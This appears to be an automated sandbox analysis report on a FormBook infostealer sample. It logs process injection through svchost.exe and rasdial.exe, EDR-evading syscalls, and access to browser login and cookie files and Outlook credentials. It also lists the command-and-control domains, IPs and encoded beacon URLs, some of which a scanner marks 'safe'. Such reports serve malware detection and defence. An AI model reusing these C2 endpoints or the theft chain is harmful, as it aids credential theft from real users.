                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 1532Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 315A008Jump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00701201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00701201
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006E2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_006E2BA5
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0070B226 SendInput,keybd_event,1_2_0070B226
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,1_2_007222DA
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"Jump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00700B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_2_00700B62
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00701663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00701663
                Source: cNDddMAF5u.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: cNDddMAF5u.exe, GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006C0698 cpuid 1_2_006C0698
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00718195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,1_2_00718195
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006FD27A GetUserNameW,1_2_006FD27A
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006DB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_006DB952
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_006A42DE

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: cNDddMAF5u.exeBinary or memory string: WIN_81
                Source: cNDddMAF5u.exeBinary or memory string: WIN_XP
                Source: cNDddMAF5u.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: cNDddMAF5u.exeBinary or memory string: WIN_XPe
                Source: cNDddMAF5u.exeBinary or memory string: WIN_VISTA
                Source: cNDddMAF5u.exeBinary or memory string: WIN_7
                Source: cNDddMAF5u.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00721204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_00721204
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_00721806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00721806
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets241
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials12
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587909 Sample: cNDddMAF5u.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.egldfi.xyz 2->28 30 www.lgdiamonds.info 2->30 32 9 other IPs or domains 2->32 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 cNDddMAF5u.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 GVXcOVOPuWmumK.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 GVXcOVOPuWmumK.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.lgdiamonds.info 130.185.109.77, 54326, 54327, 54328 XIRRADE Germany 22->34 36 gtml.huksa.huhusddfnsuegcdn.com 23.167.152.41, 54317, 80 ESVC-ASNUS Reserved 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                cNDddMAF5u.exe65%VirustotalBrowse
                cNDddMAF5u.exe82%ReversingLabsWin32.Trojan.AutoitInject
                cNDddMAF5u.exe100%AviraHEUR/AGEN.1319493
                cNDddMAF5u.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.bcg.services/5onp/0%Avira URL Cloudsafe
                http://www.43kdd.top/bsyy/0%Avira URL Cloudsafe
                http://www.lgdiamonds.info0%Avira URL Cloudsafe
                http://www.lgdiamonds.info/cv1w/0%Avira URL Cloudsafe
                http://www.lgdiamonds.info/cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp0%Avira URL Cloudsafe
                http://www.75178.club/vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy0%Avira URL Cloudsafe
                http://www.43kdd.top/bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob0%Avira URL Cloudsafe
                http://www.bcg.services/5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.lgdiamonds.info
                130.185.109.77
                truefalse
                  high
                  43kdd.top
                  154.23.178.231
                  truefalse
                    unknown
                    jalan2.online
                    108.181.189.7
                    truefalse
                      high
                      gtml.huksa.huhusddfnsuegcdn.com
                      23.167.152.41
                      truefalse
                        high
                        www.bcg.services
                        13.248.169.48
                        truefalse
                          high
                          www.75178.club
                          unknown
                          unknownfalse
                            high
                            www.jalan2.online
                            unknown
                            unknownfalse
                              high
                              www.egldfi.xyz
                              unknown
                              unknowntrue
                                unknown
                                www.betmatchx.online
                                unknown
                                unknownfalse
                                  high
                                  www.43kdd.top
                                  unknown
                                  unknownfalse
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.lgdiamonds.info/cv1w/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.43kdd.top/bsyy/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.lgdiamonds.info/cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bcg.services/5onp/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bcg.services/5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.43kdd.top/bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5obfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.75178.club/vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHyfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabrasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
